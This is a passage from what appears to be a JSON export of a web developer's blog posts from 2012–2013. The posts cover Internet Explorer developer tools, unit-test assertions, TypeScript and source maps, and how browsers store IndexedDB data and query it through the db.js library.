When targeting IE10, Firefox stable and Chrome stable it’s not particularly hard to get things looking the same and working the same. The only times it really become noticeable is when you’re doing some really whacky edge-case stuff and this is something that is only solvable by getting to a single browser, and that didn’t work out so well last time.\nIt’s not a perfect solution, but it does lessen the attitude of “modern browsers… and IE” that I commonly hear at user groups (despite IE10 trumping other browsers in some areas).\nConclusionI think the role of IE on the Windows platform needs to change. IE needs to be released from the shackles of Windows integration in the way it has been.\nUnfortunately I can’t see this happening while still maintaining an IE branding. The only alternative is the John approach, an entirely new browser, using the same stack, that can act as a conduit to IE and taking on the other browsers in the fast-evolving web that is today.\n", "id": "2013-01-17-should-internet-explorer-be-killed" }, { "title": "Making the Internet Explorer JavaScript tools better, again", "url": "https://www.aaron-powell.com/posts/2013-01-14-ie10-console-thoughts/", "date": "Mon, 14 Jan 2013 00:00:00 +0000", "tags": [ "javascript", "web", "internet-explorer", "web-dev" ], "description": "A look at what's changed since I last pointed out the failings of the IE dev tools", "content": "Almost two years ago I wrote a blog post about what I saw as problems in the IE9 developer tools.\nSince then we’ve had IE10 released as well so I decided to revisit the post and see how have the development tools changed/improved since IE9.\nconsole.log still sucks I made a point that when it comes to using console.log (and the derivatives) you often found that you got [object Object]. Well this is still the case, and most commonly you’ll see it if you’re using the console as a scratch pad to test things out. There are two solutions to this, one is to override the console.log method in a similar was as I mentioned with “fixing” console.assert or alternatively override the toString method of your object, since the reason you get [object Object] is because all it uses the toString method of the object (I override it to just do JSON.stringify(this)) You still can’t clear the console without right-clicking or using console.clear(), there’s a toolbar option that looks like it would do it but nope, that’s a cache clear button Related to the above point I really wish the Ctrl + R and/or F5 would work when input is focused on the dev tools, and by work I mean reload the page. Yes I get why they don’t work, the dev tools are running in a separate process, that’d be a nice thing to fix too… The list of provided User Agents is really good (as I said before) and the ability to save your own custom User Agents is nice Why is the DOM explorer still a static node list? C’mon this is 2013 guys and you make me refresh the DOM explorer when ever the DOM changes so I can inspect the current page state? Yes again I’m sure this is related to the fact that it’s a separate process but it’s just painful, especially if you’re working on a KnockoutJS UI or a SPA I would love an IndexedDB inspector like Chrome has in their dev tools, and since it’s build on ESE I would think that this shouldn’t be that big a deal, ESE is pretty well documented So…It looks like the IE dev tools saw very little love in the form of features with the IE10 release. 
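For reference, the toString workaround I mentioned above for the [object Object] problem is about as small as this (a sketch; adjust to taste):

var person = { firstName: 'Aaron', lastName: 'Powell' };

// give the object a toString the console will pick up
person.toString = function () {
    return JSON.stringify(this);
};

console.log(person); // JSON in the console rather than [object Object]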
I’ll admit that I didn’t really talk about the network/profile tab as I find these are not the features that you use all that often. If I want to inspect network traffic then I’m going to use Fiddler, I see no point in use any of the browsers tools for that. As for the profile tab, it’s good but I don’t often find myself trying to analyse the JavaScript performance of a page (and when I do it’s generally find that it’s Knockout or jQuery that’s causing the performance problems).\nThe last few years has seen the IE team put in the hard yards to get IE back to being a highly competitive browser in the current market for users so I hope that they start focusing on making IE a competitive browser for the web developer.\n", "id": "2013-01-14-ie10-console-thoughts" }, { "title": "The problem with Assert.IsTrue", "url": "https://www.aaron-powell.com/posts/2013-01-08-the-problem-with-assert-istrue/", "date": "Tue, 08 Jan 2013 00:00:00 +0000", "tags": [ "unit-testing", "opinionated", "ranting", "rant", "testing" ], "description": "It's time for another rant, this time it's with how some people write their unit tests", "content": "Have you ever seen a unit test that looks like this:\n1 2 3 4 5 6 7 8 public void SomeTest() { var foo = new Bar(); var result = foo.GetStuff(); Assert.IsTrue(result.Count() == 1); } Do you know what’s wrong with this test? I’ll give you a clue, the developer use Assert.IsTrue and by doing so they’ve made a bad test.\nI see a lot of tests which contain Assert.IsTrue and 9 times out of 10 I cringe when I see it. Why? Those 9 times they have performed some kind of equality test and by doing so are making it difficult to determine what a failure is when it happens and more importantly you’ve introduced logic into your assertion so you’ve stopped asserting against values and started asserting against an operation.\nTake the above test and what happens when the equality is false? Well obviously the test has failed but all your test runner will be able to tell you is just that, the equality is false. Is this because the number of results is less than 1? Greater than 1? How many are we out by? What is the actual value?\nAll of this information is lost by the equality statement!\nHere’s a tip, use Assert.AreEqual! Every testing framework I’ve worked with has this method, or something that is pretty much that. Then you can write this:\n1 2 3 4 5 6 7 8 public void SomeTest() { var foo = new Bar(); var result = foo.GetStuff(); Assert.AreEqual(1, result.Count()); } Now when your test fails the runner will tell you something along the lines of Expected 1 but got 0. This makes it much easier to work out what’s wrong and fix your test.\nThat said if you’re asserting against a Boolean property/result/etc then by all means use Assert.IsTrue or Assert.IsFalse (don’t Assert.IsTrue(!somethingFalse), that’s just stupid).\nTL;DR - Don’t use Assert.IsTrue when there are specialised assertion methods to do it for you, they’ll give you better feedback when a test fails.\n</rant>\n", "id": "2013-01-08-the-problem-with-assert-istrue" }, { "title": "Thoughts on TypeScript", "url": "https://www.aaron-powell.com/posts/2013-01-07-thoughts-on-typescript/", "date": "Mon, 07 Jan 2013 00:00:00 +0000", "tags": [ "javascript", "typescript" ], "description": "Some of my impressions from trying to implement something in TypeScript", "content": "When TypeScript was announced I was pretty skeptical of it. 
I’ve been doing JavaScript development for a while now, I know many of the ins and outs of JavaScript development and I’ve never seen any problem with the syntax or the lack of type system.\nBut like a good skeptic I wanted to reserve my opinion until I had a chance to actually use it. This was the same approach which I took with CoffeeScript, you don’t really know something until you’ve made something with it (and for the record I wasn’t particularly fussed by CoffeeScript).\nWell I decided to do this, I wrote a small library called mathy and I wanted to share some of my thoughts from having made something with it. Keep in mind this is only a small library so it’s not exactly extensive, but I feel it’s a good start.\nProject backgroundI just want to clarify a few things about how I did this project:\nI used Sublime Text 2 as my editor, not Visual Studio This is written primarily as a Node.js package but I also want it to work in the browser The repository should contain the TypeScript source and the output JavaScript, consumers shouldn’t be forced to use TypeScript if they don’t want to The good The compiler errors can be nice, caught a few spelling errors and API usage errors through them which I wouldn’t have caught until runtime/while the tests were being executed Debugging is fine. Even though I’m not debugging the TypeScript (since it’s run as the compiled JavaScript through Node.js I don’t have source map debugging) the JavaScript looks close enough to my original code that it’s pretty obvious as to where I’m at Being able to create modules using a keyword is good, save a bunch of boilerplate guff I’ve used a class for part of the API which is very handy and easy to use, but most importantly it’s syntactically simple It doesn’t try and stop me from writing any of the funky stuff that I actually want to write ;) Fat-arrow => is really sweet, I’d never really got into CoffeeScript enough to have built anything much but I can see why those guys rave about it The bad If you’re not using Visual Studio it’s kind of a pain, Sublime Text 2 only has syntax highlighting support so you don’t exactly get much benefit, no intellisense or anything The fact you can’t programmatically use the compiler sucks. Even though TypeScript’s compiler is available as a Node.js package you have to execute the compiler yourself and pass in the input. It’d be nicer if you could just require('typescript') instead of what I have to do in the Makefile The way modules are generated can be a real pain if you’re trying to target the browser and Node.js. If you want to go with CommonJS the internal modules they generate create a global variable to store your object in, but that won’t work in Node.js as the variable isn’t exported. If you make it a public module it assumes there is a public “exports” object to attach to which is fine in Node.js but sucks in the browser! I had to have a shitty implementation to get it working that assumes in the browser there is the exports object. You can use the AMD support but it forces you to use RequireJS (or CurlJS or any other loader). 
It’d be nicer if there was optional AMD support, like how I have it done in db.js, so you can have something that will export as a AMD if AMDs are available, otherwise just be a global object There seems to be no way to plug a definition file into Node.js so all my unit tests are just written in plain JS which really sucks as I changed the API and didn’t realise until every single unit test failed The really shitty The generated code isn’t in a closure scope unless you use a module, which in turn the closure scope is really ridged (particularly from the CommonJS module point of view) which means You can’t create interfaces in a function You can’t create classes in a function You can’t create modules in a function (ok, I kind of get this one) ConclusionSo with all that considered what’s my thoughts so far? I actually do like it, particularly the way the compiler can catch some stupid mistakes. I’d like to try it on a much bigger project, particularly something in Visual Studio to see how well that goes, especially by having things like intellisense working.\nThe biggest problem I see is the module system, it’s really shit if you don’t do exactly as Microsoft does, and here in lies the problem. If you want to load in third party libraries it really doesn’t work too nicely, you end up with any type declarations around which really isn’t helpful.\n", "id": "2013-01-07-thoughts-on-typescript" }, { "title": "2012, a year in review", "url": "https://www.aaron-powell.com/posts/2013-01-06-2012-a-year-in-review/", "date": "Sun, 06 Jan 2013 00:00:00 +0000", "tags": [ "year-review" ], "description": "Time for yet another year in review", "content": "It’s about that time again but I’m a bit delayed in getting it done, it’s time for a year in review!\nBacking up from the busy year that was 2011 I…\nKept my MVP and got to go to the MVP summit in Seattle Went to the first Codemania in NZ to hang out with some of the guys in the NZ dev community Had first Pluralsight course on JavaScript design patterns was published Played the hipster dev for my DDD Melbourne talk this year, taking about developing everything in the browser, which was based off a similar talk from Web Directions What Do You Know Released my first Windows 8 application which needs some serious TLC, damn lack of free time :( Made a surprise appearance at CodeGarden 12, helped killed Umbraco 5, pointed out that MVC has always been possible with Umbraco and once again encouraged people to get involved in Umbraco which has been going really well since then Stepped out of my comfort zone and did some XAML but I’m still unconvinced by it Presented at Teched again, this time on Win8 app dev with HTML and JavaScript where I was kind of just ranting :P Dived into IndexedDB and released a wrapper library called db.js to deal with some of the shitty API points Played with TypeScript, the Microsoft answer to “the JavaScript problem”. My blog about using source maps for TypeScript was by far my most popular post Got engaged and bought a house (cuz you know, sometimes I get off the computer…) It’s been a bit quieter than in the past few years, but a much more maintainable a pace I think. 
Now to prepare for 2013…\n", "id": "2013-01-06-2012-a-year-in-review" }, { "title": "Chrome support for db.js", "url": "https://www.aaron-powell.com/posts/2012-10-18-dbjs-chrome/", "date": "Thu, 18 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "chrome", "web" ], "description": "A little word on the db.js support for Chrome", "content": "I recently had a bug opened on db.js which is related to Chrome operating differently to the other browsers.\nAfter spending some time digging into the problem I came to realise that the problem was to do with the way older versions of Google’s Chrome implement IndexedDB (where older versions are any version prior to Chrome 23).\nPrior to Chrome 23 Chrome didn’t support the final specification for IndexedDB completely, in fact they were still implementing the spec from April 2011 and the root of the problem was how changing database versions worked.\nTL; DRdb.js will not be supporting Chrome 22 or lower, even if they have webkitIndexedDB defined.\nLonger storyTo understand the problem we need to understand what changed in the specification between April 2011 and today. The change that is causing the most problems is how IndexedDB handles new versions of each database. In case you missed it, when you open a database with db.js (or well just IndexedDB) you need to provide a version number for the schema. This is because a database can change across versions and IndexedDB allows you to maintain the old schema.\nInitially the way version changes were handled was using a setVersion method, like so:\nvar req = indexedDB.open('db'); req.onsuccess = success; req.onerror = fail; function success(e) { var db = e.target.result; var req = db.setVersion("1"); req.onsuccess = createSchema; req.onerror = fail; } function createSchema(e) { //create schema } The problem is that this was changed, instead of using this method to change a schema version it was added to the open call and is used in conjunction with a onupgradeneeded event off the request, like so:\nvar req = indexedDB.open('db', 1); req.onupgradeneeded = createSchema; req.onsuccess = success; req.onerror = fail; Personally I’m quite glad that they made this change, I think it makes for a much cleaner API as you don’t have nested database requests. But ultimately this was a very radical change to the way the API worked.\nThe Chrome problem Chrome was the last browser to adopt this change, drilling down through the changeset history, issue history and mailing list archive it was apparent that the Chrome team was reluctant to just drop the support for setVersion like the other browsers because they were concerned about existing implementations and this is a fair enough justification, no one wants to introduce breaking changes.\nThe problem was there was no good way to tests for this change. Initially db.js did have attempted smarts as to how it will handle database version changes but the problem was that there was no way to detect for the existence of the onupgradeneeded event, only the setVersion method. Interestingly enough even through Chrome 23+ does support the onupgradeneeded it also has setVersion. 
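Supporting both paths ends up looking something like the sketch below (illustrative only, ignoring vendor prefixes and not the code that was actually in db.js; createSchema and ready are placeholder functions):

var req = indexedDB.open('db', 1);
var upgraded = false;

// spec-compliant browsers fire this when the version changes
req.onupgradeneeded = function (e) {
    upgraded = true;
    createSchema(e.target.result);
};

req.onsuccess = function (e) {
    var db = e.target.result;
    if (upgraded || typeof db.setVersion !== 'function') {
        return ready(db);
    }
    // old Chrome: no upgradeneeded event, fall back to setVersion
    // (a real implementation would also compare db.version first)
    var verReq = db.setVersion('1');
    verReq.onsuccess = function () {
        createSchema(db);
        ready(db);
    };
};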
As you can expect this added a lot more complexity to the code!\nUltimately what it came down to was it was overly complex to support both versioning methods, so I made the decision that any implementation that uses setVersion and not onupgradeneeded it won’t work as in the time it would take to resolve the problems I was seeing Chrome 23 will make it to the stable channel.\n", "id": "2012-10-18-dbjs-chrome" }, { "title": "Reverse order unique queries in IndexedDB", "url": "https://www.aaron-powell.com/posts/2012-10-08-reverse-order-unique-indexes/", "date": "Mon, 08 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web" ], "description": "The quirk of reverse index querying in IndexedDB and in turn db.js", "content": "In my post my db.js querying I covered how to do reverse unique queries with db.js using the desc().distinct() method chaining which will query an index for the unique items, but it’ll do it in reverse order, essentially it will set a IDBCursor direction of prevunique.\nWhen covering off I mentioned that the way it works is a little unusual and here I’ll explain why.\nHow an index “looks”So you’ve got an index in your object store, an index which is non-unique, and it contains duplicate values. Say you created an index like this:\nstore.createIndex('foo', 'foo', { unique: false }); Next you’ve pushed a few items into it:\nstore.add({ foo: 'bar' }); store.add({ foo: 'bar' }); store.add({ foo: 'baz' }); The data which has been stored in the index can be visualised as so:\nKey Value bar { id: 1, foo: 'bar' } bar { id: 2, foo: 'bar' } baz { id: 3, foo: 'baz' } Walking our indexFrom the diagram you can see the order of the data in our index, let’s assume we’re wanting to just walk through the index normally, using the next direction (the default if you don’t set anything). We’ll get back the records in the order of id 1, 2, 3, or by their key, bar, bar, baz. Now this makes sense, we’re walking top-to-bottom just as the spec states and as we’d expect from looking at our index.\nNow let’s turn that into a nextunique query, this time we get back the records with the id 1, 3, or the index keys bar, baz.\nThis is again to be expected, if you review the spec it states (emphasis is mine):\n“nextunique”. This direction causes the cursor to be opened at the start of the source. When iterated, the cursor should not yield records with the same key, but otherwise yield all records, in monotonically increasing order of keys. For every key with duplicate values, only the first record is yielded. When the source is an object store or a unique index, this direction has the exact same behavior as “next”.\nSo what’s interesting here is that there are deterministic rules as to how the item to be returned is selected from the index, basically it’s what ever is first in the index for that key. This is basically what we’d expect, no surprised so far.\nWalking backwards through our indexWe’ve looked at walking forward through our index, but what if we want to walk backwards through it? Well that’s where the prev cursor direction is for. Say we were to do a read-all operation using a prev cursor, we’ll have the records in the order of id 3, 2, 1, or baz, bar, bar.\nNot particularly shocking here, again that’s what we’d be expecting, we’ve started at the end of the index and we’ve grabbed the item then gone to the one before it in the index and so on.\nNow it’s over to the prevunique query so that we can get just a unique item for each index key from our index. 
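In raw IndexedDB terms that’s a cursor opened over the index with the prevunique direction, roughly like this (assuming store is the object store from the example above, obtained inside a read transaction):

var index = store.index('foo');

// walk the index backwards, skipping duplicate keys
index.openCursor(null, 'prevunique').onsuccess = function (e) {
    var cursor = e.target.result;
    if (!cursor) {
        return; // finished walking the index
    }
    console.log(cursor.key, cursor.value.id);
    cursor.continue();
};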
The items we get back have an ID order of 3, 1 or the index keys baz, bar. Wait something doesn’t look right there, the ID’s were:\n3 1 And this is where it starts getting confusing…\nUnderstanding prevunique Let’s have a look at the spec for prevunique (emphasis is mine):\n“prevunique”. This direction causes the cursor to be opened at the end of the source. When iterated, the cursor should not yield records with the same key, but otherwise yield all records, in monotonically decreasing order of keys. For every key with duplicate values, only the first record is yielded. When the source is an object store or a unique index, this direction has the exact same behavior as “prev”.\nDo you see the confusing point, it states that when a duplicate item is found of a key you take the first record and this is where I was tripped up. When I first read this I took it as the first record found in the index, so when walking backwards in our example index above, we would get the ID of 2 as it was the first record with the bar key. But this is not the case, it is actually the first record in the index with that key, and since the record with the id 1 appears first in the index it will be returned. The key order is correct, we’ve reverse-walked it based on that, but it was the item order that trips people up. In fact I raised a bug on Chrome as I was assuming that they had got it wrong. The bug has since been closed as it is implemented correctly.\nThe order can be summed up as:\nReverse order by keys, items by index position\nConclusionThe way IndexedDB handles reverse index walking is a little bit confusing on first read, but the more you review it the more that it starts to make some sense.\nCurrently IE10 doesn’t handle this correctly though, it incorrectly reverses the order of the items in the index, I raised the question to them and you can find out more in the thread on the mailing list.\nAdmittedly this is a pretty esoteric problem to come across though, I can’t think of an instance where the ordering of items in an index when traversed in reverse would be important, but then that may really just be a failure of imagination. If order is really that important you’re probably best structuring your data so that the key can be unique.\n", "id": "2012-10-08-reverse-order-unique-indexes" }, { "title": "How the browsers store IndexedDB data", "url": "https://www.aaron-powell.com/posts/2012-10-05-indexeddb-storage/", "date": "Fri, 05 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web" ], "description": "A starting point for learning where and how ", "content": "As you’ve probably noticed I’ve been doing a lot of digging into IndexedDB across the various browsers but there’s one thing that I find quite interesting, how it all works. So for the TIL session we’ve going to find out how the browsers store the data for IndexedDB*.\n*Note: This will be a pretty high-level look since I’m sooo not a C++ developer and C++ is the primary language of browser engines :P.\nInternet ExplorerWe’ll start with the first browser to go unprefixed for IndexedDB, IE (well IE10), also since we can’t look at the source of IE most of this is speculative.\nInternet Explorer uses the Extensible Storage Engine as its underlying storage model. 
This is the same database format that many of Windows features use including the Desktop Search (very common in Windows 8), Active Directory on Windows Servers and even Exchange.\nESE seems like a good idea for IndexedDB as it has many of the features that you’re going to want such as keys, indexes and multi-value indexes* so I’m not surprised that the IE team have built on top of what is already there.\n*Side point - IE currently doesn’t support multiEntry indexes from IndexedDB which really sucks, especially since ESE seems to support it natively :(.\nIf you’re curious to go digging around for your IndexedDB files you’ll find them at:\n%AppData%\\Local\\Microsoft\\Internet Explorer\\Indexed DB\\Internet.edb\nSo far I haven’t had much luck getting into this file to view the database contents, I’ve tried EseDbViewer but it fails to open the database files and trying to dig through the Windows API itself is just plain unpleasant. Nobody likes COM.\nFirefoxFirefox was the 2nd browser to go prefix free with IndexedDB, it is unprefixed as of version 16. Logically since Firefox is a cross-platform browser they use a cross-platform database, SQLite. It’s also not surprising that they are using SQLite as IndexedDB replaced the WebSQL proposal which was based on SQLite (one of the reasons cited as to discontinuing WebSQL was everyone used SQLite so they weren’t getting independent implementations), so it makes sense that they salvaged what they could from the first implementation of a complex storage model.\nBeing open source you can browse the code for Firefox’s IndexedDB implementation which is awesomely mind bending. Check out the OpenDatabaseHelper.cpp, it’s responsible for setting up your database connection as well as doing a bunch of SQL to make sure everything is ready for data (yep, Firefox has SQL statements in it!). Another file of interest is IDBObjectStore.cpp and the line I’ve linked to is the method that is responsible for inserting a new record into the database (at least I’m pretty sure it is).\nIf you are wanting to look into your database then the easiest way is with the SQLite Manager Firefox extension. The files created for IndexedDB are stored in the following location:\n%AppData%\\Roaming\\Mozilla\\Firefox\\Profiles\\your profile id\\indexedDB\\domain\nOpen up the SQLite Manager extension and then you can dive into your database.\nChrome / WebKitAt the time of writing the IndexedDB implementation of WebKit, and by extension Chrome, is still prefixed, in fact they are prefixing pretty much everything IndexedDB related with webkit. The implementation seems to be driven by the Chrome team and that probably also indicates why they are using a Google produced database, LevelDB.\nNote: The implementation is already in the main WebKit repository which means that sooner or later it will appear in Safari as they also use WebKit under the hood.\nYou can browse the source of their implementation in all its C++ glory, it really is quite nicely written, at least to my untrained C++ eyes. The actual storage of the data is done through the IDBLevelDBBackingStore.cpp class, but exposed as an abstraction so I guess it can be swapped out (and I’d guess that’s how they swapped between SQLite and LevelDB to begin with). 
The one thing that I do find curious is that LevelDB doesn’t support indexes yet obviously IndexedDB does, so there’s probably some trickery going on when they are pushing the data into the database (and well it hurts my head to read that much C++ :P).\nThere isn’t any stand-alone viewer for LevelDB that I’ve come across but really that’s not that big a deal as currently Chrome is the only browser who has an IndexedDB inspector built into its developer tools. Just navigate to the Resources tab and there’s an IndexedDB section (you may have to right click -> refresh the node as it’s not a live view). I do hope the other browser vendors bring this feature in as well as it’s really quite neat to have. But if you really must find the files for IndexedDB then they are located here:\n%AppData%\\Local\\Google\\Chrome\\User Data\\Default\nNote: If you’re using Chrome Canary then it’s in the Chrome SxS folder.\nConclusionTIL:\nIE uses the same database format as Exchange and Active Directory for IndexedDB Firefox is using SQLite so are kind of implementing a NoSQL database in to SQL database Chrome (and WebKit) are using a Key/ Value store which has heritage in BigTable C++ is no less scary than when I was at uni ", "id": "2012-10-05-indexeddb-storage" }, { "title": "Interesting finds in the IE10 UA switcher", "url": "https://www.aaron-powell.com/posts/2012-10-04-ie10-user-agent-switching/", "date": "Thu, 04 Oct 2012 00:00:00 +0000", "tags": [ "web", "debugging" ], "description": "How had I missed all this before?", "content": "I was looking around in the IE10 developer tools today and dug into the Tools -> Change user agent string menu and came across some interesting UA options:\nHow did I miss that IE10 in Windows 8 RTM has built in User Agents for IE10 for Windows Phone 8 and IE for Xbox?\nThat’ll teach me to only ever use the Browser Mode options…\n", "id": "2012-10-04-ie10-user-agent-switching" }, { "title": "Using Source Maps with TypeScript", "url": "https://www.aaron-powell.com/posts/2012-10-03-typescript-source-maps/", "date": "Wed, 03 Oct 2012 00:00:00 +0000", "tags": [ "typescript", "debugging", "web" ], "description": "Another quick look at what you can do with TypeScript", "content": "Have you heard of Source Maps? Source Maps are an idea that has come out of Mozilla for addressing the debugging issues that are raised by *-to-JavaScript compilers and JavaScript minifiers, the problem is that when you use these you ultimately aren’t debugging what you wrote.\nTake TypeScript for example and the improved version (original) of the PubSub from yesterday, we’ve got a problem, the code is quite different to what we’d be running in the browser. This is a big problem as if you’re not familiar with JavaScript, or at least not comfortable with the language nuances, you’ll quickly get lost and make a royal mess of what you’re writing.\nSource Maps for TypeScriptIntelligently the TypeScript team have already done the hard work for us, there’s a Source Map generator in the compiler (thanks Ryan for pointing it out)!\nSo how do you use it? If you do a help dump of tsc (the TypeScript compiler) there’s nothing in it:\nD:\\Code> tsc -h Syntax: tsc [options] [file ..] 
Examples: tsc hello.ts tsc --out foo.js foo.ts tsc @args.txt Options: -c, --comments Emit comments to output --declarations Generates corresponding .d.ts file -e, --exec Execute the script after compilation -h, --help Print this message --module KIND Specify module code generation: "commonjs" (default) or "amd" --nolib Do not include a default lib.d.ts with global declarations --out FILE Concatenate and emit output to single file --target VER Specify ECMAScript target version: "ES3" (default), or "ES5" @<file> Insert command line options and files from a file. Well good news everybody, that’s not listing all the compiler switches ;). Check out the batchCompile method for a bunch of gems, but most importantly there is a sourcemap switch, so if I take my little project:\nD:\\Code\\typescript-pubsub> tsc -sourcemap pubsub.ts Now you’ll have two files, pubsub.js and pubsub.js.map and the output JavaScript file will also contain the source map pointer:\n//@ sourceMappingURL=pubsub.js.map Sweet! Let’s open the HTML file in Chrome Canary (of which I’ve already enabled Source Maps) and we get some cool new debugging stuff:\nYou can find your .ts file in the sources list.\nI’ve break pointed inside of TypeScript!\nInspecting variables in TypeScript\nConclusionThe fact that there was enough forward planning from the TypeScript team to include support for Source Maps in the initial release is a really great thing. Through the magic of Chrome we can debug code written in it as through it was our original code. If you want have a play here’s the code.\nHopefully either the Visual Studio or IE (or both) team also pick up Source Maps and add support for them too.\nHappy cross-compiling.\n", "id": "2012-10-03-typescript-source-maps" }, { "title": "Indexes and Queries in db.js", "url": "https://www.aaron-powell.com/posts/2012-10-02-dbjs-indexes-and-queries/", "date": "Tue, 02 Oct 2012 00:00:00 +0000", "tags": [ "indexeddb", "web", "winjs" ], "description": "An overview of how to create indexes and execute powerful queries against them using db.js", "content": "In my last post I introduced a new library I’ve been working on for IndexedDB called db.js.\nOne thing that I was slow in my understanding of with IndexedDB is how indexes work, and just how powerful they can be. Now that I’ve got that down pat the support in db.js is greatly improved. Also a big shout out to Bob Wallis who did a great job at adding the initial revision of index range queries.\nCreating a key pathWhen creating an object store, or table if you will, you’re most likely going to want to have some kind of unique identifier for each record; this is what the role of the key path is. To create a key path when you define the schema for your database you can provide it with the key property:\ndb.open({ name: 'my-app', version: 1, schema: { people: { key: { keyPath: 'id', autoIncrement: true } } } }); What I’ve done here is defined that I want to have a property added to my objects called id which will be auto-incrementing (which will make it a number). Now when I add a new person the object will have a new property:\nserver.people .add({ firstName: 'Aaron', lastName: 'Powell' }) .done(function (person) { console.log(person.id); //on a clean db this will be 1 }); This key is useful if you want to access unique records from your store.\nCreating an indexWhile a key path is useful for a narrow set of scenarios it’s likely that you’ll be doing queries that are against other information in the store. 
Let’s take our example and say we wanted to be able to query against the firstName property. For this we would want to create a non-unique index for our records:\ndb.open({ name: 'my-app', version: 1, schema: { people: { key: { keyPath: 'id', autoIncrement: true }, indexes: { firstName: { } } } } }); Now if we were to inspect our person store we would find an indexName of firstName. This allows us to perform queries against said index and have it perform much faster than manually filtering the records ourselves, especially in large data sets.\nYou can create multiple indexes here by adding more properties to the indexes property on the schema. If you want to set any of the index parameters (IDBIndexParameters) you can provide them as properties of the object for the index.\nQuerying an indexInitially I didn’t really wrap my head around indexes very well and when I started db.js there wasn’t a whole lot of useful IndexedDB articles, most of the stuff you had to work out by reading the specification (which is so not written for consumers of an API!). Luckily now db.js has really good support for indexes and how you can query them.\nLet’s look at how we could query an index for all people with the first name of Aaron:\nserver.people .query('firstName') .only('Aaron') .execute() .done(function (people) { //Do stuff with all the Aaron's }); The first thing that’s different compared to the query in my last post is when we invoke the query method we are providing it with the name of the index we want to query.\nNext off we’re using the only method. This method opens up a IDBKeyRange of type only which will then select values that match that value exactly. This is very quick for reducing the amount of records returned from the object store itself.\nQuerying across rangesSometimes you want a range of data, say you want people who are in a certain age bracket. Let’s pretend that we have a numerical age property on our person object and we’ve created an index for it exactly the same way we created the firstName index. Now through the magic of db.js (well, IndexedDB :P) we can perform a set of range queries:\nserver.people .query('age') .lowerBound(28 /*, true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are 28 years or older }); server.people .query('age') .upperBound(28 /*, true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are 28 years or younger }); server.people .query('age') .bound(25 ,35 /*, true , true */) //by default it's an inclusive query, set to `true` to be exclusive .execute() .done(function (people) { //all the people who are between 25 and 35, inclusive }); This shows the usage of:\nlowerBound Get records using the provided value as a starting point Optional second argument to if we want an exclusive query instead of inclusive, which is the default upperBound Get records using the provided value as an ending point Optional second argument to if we want an exclusive query instead of inclusive, which is the default bound Gets values between a range The 3rd and 4th arguments represent the exclusive nature, both default to false, implying inclusive but you can control the boundaries individually These methods are from IndexedDB in pretty much their raw format but exposed in db.js so we can easily use the chaining to do the querying. 
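To make that concrete, here’s a hedged sketch of roughly what the bound() example above maps to against the raw IndexedDB API; the db variable is assumed to be a plain IDBDatabase connection (not the db.js server) with the people store and age index from the example already created, and the transaction mode is written in its modern string form:

var transaction = db.transaction('people', 'readonly');
var index = transaction.objectStore('people').index('age');
var range = IDBKeyRange.bound(25, 35, false, false); // the two booleans are the exclusive flags, false = inclusive
var results = [];
index.openCursor(range).onsuccess = function (e) {
    var cursor = e.target.result;
    if (cursor) {
        results.push(cursor.value); // collect each matching record
        cursor.continue();          // move on to the next record in the range
    } else {
        console.log(results);       // everyone aged between 25 and 35, inclusive
    }
};

That cursor boilerplate is what the lowerBound, upperBound and bound methods are saving you from writing by hand.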
And the advantages of these ranges is the same as when you look at a real database, we only take a subset of the record set so it should be quicker.\nAdvanced querying of indexesSo now we’ve got the basics down of creating a query against an index let’s look at some of the more advanced features of db.js’s query API.\nSort order By default db.js (well more accurately IndexedDB) will return your data in ascending order. Assuming we’ve stored the following information:\nvar people = [{ firstName: 'Aaron', lastName: 'Powell', age: 28 }, { firstName: 'John', lastName: 'Smith', age: 30 }, { firstName: 'Bill', lastName: 'Jones', age: 50 }]; We’ve got three people with three different ages. If we were to do a bound query of bound(25, 35) we’ll have the records returned in the order of ‘Aaron’ then ‘John’. What if we want that order reversed?\nEasy, add a desc call:\nserver.people .query('age') .bound(25 ,35) .desc() .execute() .done(function (people) { //all the people who are between 25 and 35 }); With the desc call we tell IndexedDB that we want to use IDBCursor.prev which will tell IndexedDB to go backwards through our index.\nUnique items When you create an index you can specify if you want the data to be unique but often this wont be the case, you just want to have an index of commonly searched terms. But what if you want to get just a single entry for each record out of the index, regardless of how many there are. A use case for this would be you want to know how many unique first names there are in your store. For this we can use the distinct method:\nserver.people .query('firstName') .all() .distinct() .execute() .done(function (people) { //only one entry per name }); The distinct method also augments the IDBCursor state by using nextunique or prevunique cursor directions which the clued in reader will realise means you can do a descending unique query as well as an ascending unique query.\nNote: The way prevunique works is a little confusing and better covered off in a separate blog post.\nUnique keys While the previous example is good it is not exactly what we wanted for the scenario laid forth. Even though we’re able to query the index and get back the unique records we get back the whole record. This is somewhat problematic as we’re still pulling out more data than we really would want to be getting out, for the scenario we only wanted the keys. Well we can get just that information out if we need to:\nserver.people .query('firstName') .all() .distinct() .keys() .execute() .done(function (names) { //only one entry per name }); By adding the keys() call we use an openKeyCursor call in IndexedDB, giving us just the keys that the index has. 
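For the curious, here’s a hedged sketch of roughly what keys() combined with distinct() translates to in raw IndexedDB; again db is assumed to be a plain IDBDatabase connection, and the cursor direction is written in its modern string form:

var index = db.transaction('people', 'readonly').objectStore('people').index('firstName');
var names = [];
// openKeyCursor never loads the full record, and 'nextunique' skips duplicate index keys
index.openKeyCursor(null, 'nextunique').onsuccess = function (e) {
    var cursor = e.target.result;
    if (cursor) {
        names.push(cursor.key); // the index key, i.e. the first name
        cursor.continue();
    } else {
        console.log(names);     // one entry per distinct first name
    }
};

db.js hides all of that behind the chained keys() and distinct() calls.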
